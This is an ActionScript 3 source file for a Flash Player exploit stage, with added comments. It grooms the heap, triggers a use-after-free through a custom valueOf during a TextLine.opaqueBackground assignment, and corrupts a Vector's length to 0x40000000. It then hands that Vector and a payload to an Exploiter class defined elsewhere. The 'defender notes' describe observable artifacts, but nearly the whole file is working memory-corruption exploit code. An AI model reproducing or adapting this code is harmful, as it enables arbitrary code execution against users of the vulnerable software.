package
{
import flash.display.DisplayObjectContainer;
import flash.utils.ByteArray;
import flash.system.Capabilities;
import flash.events.MouseEvent;
import flash.external.ExternalInterface;
import flash.text.*;
import flash.text.*;
import flash.text.engine.*;
/**
 * Heap-corruption exploit stage built around the TextLine.opaqueBackground
 * setter (the file's own comments call it "the vulnerable setter").
 *
 * Reading order: TryExpl() lays out Vector.<uint> and TextLine objects in _ar,
 * installs valueOf2() as MyClass.prototype.valueOf, then assigns _mc to a
 * TextLine's opaqueBackground. valueOf2() runs during that assignment and
 * frees / reallocates objects so that one Vector ends up reporting a length
 * far larger than it was created with. That Vector is handed to Exploiter.
 *
 * Defender notes, limited to what this file shows: all state is static; the
 * observable artifacts are a Vector.<uint> whose length reaches LEN40
 * (0x40000000), the replacement of MyClass.prototype.valueOf, and the literal
 * Logger.log() messages below. Exploit, Exploiter and Logger are referenced
 * but not defined in this file.
 */
public class MyClass
{
    static var
        // Every _ar built by TryExpl() is pushed here; presumably to keep the
        // arrays reachable across retries ("try again" path) — not freed here.
        _gc:Array,
        // Working array, three regions:
        //   [0, _arLen1)        Vector.<uint>(_vLen)
        //   [_arLen1, _arLen2)  TextLine created by _tb
        //   [_arLen2, _arLen)   Vector.<uint>(8) with element 0 set to its own index
        _ar:Array,
        _arLen1:int,          // end of the first Vector region (10 * 3)
        _arLen2:int,          // end of the TextLine region (_arLen1 + 4 * 4)
        _arLen:int,           // total length of _ar (_arLen2 + 10 * 8)
        _vu:Vector.<uint>,    // scratch during the scan; afterwards the corrupted Vector passed to Exploiter
        _vo:Vector.<Object>,  // not referenced in this file
        _tb:TextBlock,        // TextBlock used to create and recreate the TextLines
        _tl:TextLine,         // not referenced in this file
        _mc:MyClass,          // instance assigned to opaqueBackground; its valueOf is replaced by valueOf2
        _is64 = null,         // not referenced in this file (untyped)
        _chrome:Boolean,      // not referenced in this file
        _done:Boolean,        // not referenced in this file
        _cnt:int,             // index into _ar of the TextLine currently being assigned from valueOf2
        _vLen:int,            // element count for the first Vector region and for growing the last region (400/4-2 == 98)
        _magic:uint = 0x123456, // not referenced in this file
        LEN40:uint = 0x40000000; // value written past the end of the over-long Vector; also the "success" threshold

    /**
     * Replacement valueOf installed on MyClass.prototype by TryExpl().
     *
     * Presumably invoked each time `_ar[_cnt].opaqueBackground = _mc` makes the
     * runtime convert _mc to a primitive. Each invocation advances _cnt and
     * performs the next opaqueBackground assignment, so the calls nest until
     * _cnt reaches _arLen2. On the innermost level it recreates the five most
     * recently prepared TextLines (_ar[_arLen2-1] .. _ar[_arLen2-5]) and then
     * grows every Vector in [_arLen2, _arLen) to _vLen elements.
     *
     * Returns _vLen+8 on every path; any Error is logged and swallowed, so the
     * caller never observes a failure from inside the nested assignments.
     */
    static function valueOf2()
    {
        try
        {
            if (++_cnt < _arLen2) {
                // recursive call for next TextLine
                _ar[_cnt].opaqueBackground = _mc;
            } else {
                Logger.log("MyClass.valueOf2()");

                // free internal objects
                for(var i:int=1; i <= 5; i++)
                    _tb.recreateTextLine(_ar[_arLen2-i]);

                // reuse freed memory
                // (the small Vectors are grown from 8 to _vLen elements here)
                for(i=_arLen2; i < _arLen; i++)
                    _ar[i].length = _vLen;
            }
        }
        catch (e:Error)
        {
            Logger.log("valueOf2 " + e.toString());
        }
        return _vLen+8;
    }

    /**
     * Entry point of this stage.
     *
     * Builds the _ar layout, installs valueOf2 on MyClass.prototype, and starts
     * the nested opaqueBackground assignments at _ar[_arLen2-6]. Afterwards it
     * scans [_arLen2, _arLen) for a Vector whose length exceeds _vLen+2; if that
     * Vector's element at index _vLen still holds _vLen, the code writes LEN40
     * there (its own comment: "corrupt next vector") and then re-reads the
     * neighbouring Vector through `_ar[_vu[_vLen+2]]` — presumably element 0 of
     * the neighbour, which the setup loop set to the neighbour's own index.
     *
     * A Vector with length >= LEN40 is handed to Exploiter (defined elsewhere);
     * otherwise an Error("try again") is thrown. Every Error, including that
     * one, is caught by the surrounding try/catch and only logged.
     *
     * @param e        Exploit context, forwarded to Exploiter (type not defined in this file);
     *                 note the catch clause below declares another `e`, shadowing this one
     * @param platform forwarded to Exploiter
     * @param os       forwarded to Exploiter
     * @param payload  forwarded to Exploiter
     */
    static function TryExpl(e:Exploit, platform:String, os:String, payload:ByteArray)
    {
        try
        {
            // init vars
            Logger.log("init vars")
            _arLen1 = 10 * 3; // 10 vectors per page
            _arLen2 = _arLen1 + 4 * 4; // 4 TextLine per page
            _arLen = _arLen2 + 10 * 8;
            _ar = new Array(_arLen);
            if (!_gc) _gc = new Array();
            _gc.push(_ar);
            if (!_tb) {
                _tb = new TextBlock(new TextElement("TextElement", new ElementFormat()));
                if (!_tb) throw new Error("_tb = " + _tb);
            }
            _mc = new MyClass();
            _vLen = 400/4-2;

            // fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)
            Logger.log("fill 400-byte holes (400 is factor of 0x320(800) opaqueBackground corruption offset)")
            for(var i:int; i < _arLen1; i++)
                _ar[i] = new Vector.<uint>(_vLen);

            // prepare Vector objects
            Logger.log("prepare Vector objects")
            for(i=_arLen2; i < _arLen; i++){
                _ar[i] = new Vector.<uint>(8);
                _ar[i][0] = i; // each Vector records its own _ar index; read back via _vu[_vLen+2] below
            }

            // prepare TextLines
            Logger.log("prepare TextLines")
            for(i=_arLen1; i < _arLen2; i++)
                _ar[i] = _tb.createTextLine();
            // fill 1016-byte holes (0x38c is a size of internal TextLine object)
            Logger.log("fill 1016-byte holes (0x38c is a size of internal TextLine object)")
            for(i=_arLen1; i < _arLen2; i++)
                _ar[i].opaqueBackground = 1; // alloc 1016 bytes

            // set custom valueOf() for _mc
            Logger.log("set custom valueOf() for _mc")
            MyClass.prototype.valueOf = valueOf2;

            // here we go, call the vulnerable setter
            // valueOf2 takes over from here: it walks _cnt up to _arLen2 through nested assignments
            Logger.log("here we go, call the vulnerable setter")
            _cnt = _arLen2-6;
            _ar[_cnt].opaqueBackground = _mc;

            // find corrupted vector length
            Logger.log("find corrupted vector length ")
            for(i=_arLen2; i < _arLen; i++) {
                _vu = _ar[i];
                // after valueOf2 these Vectors should report _vLen; anything larger is the corrupted one
                if (_vu.length > _vLen+2) {
                    Logger.log("ar["+i.toString()+"].length = " + _vu.length.toString(16));
                    Logger.log("ar["+i.toString()+"]["+_vLen.toString(16)+"] = " + _vu[_vLen].toString(16));
                    if (_vu[_vLen] == _vLen) {
                        // corrupt next vector
                        _vu[_vLen] = LEN40;
                        // get corrupted vector
                        _vu = _ar[_vu[_vLen+2]];
                        break;
                    }
                };// else CheckCorrupted(_vu, i); // 4RnD
            }

            // check results
            Logger.log("v.length = " + _vu.length.toString(16));
            if (_vu.length < LEN40) throw new Error("try again");

            // Exploiter is not defined in this file; 0x62 is an opaque constant here
            var exploiter:Exploiter = new Exploiter(e, platform, os, payload, _vu, 0x62)

            // clean up
            // (only a log line; nothing allocated above is released here)
            Logger.log("_vu.length = " + _vu.length.toString(16));
        }
        catch (e:Error)
        {
            // also reached for the "try again" Error; failures are only logged, not rethrown
            Logger.log("TryExpl " + e.toString());
        }
    }

}
} |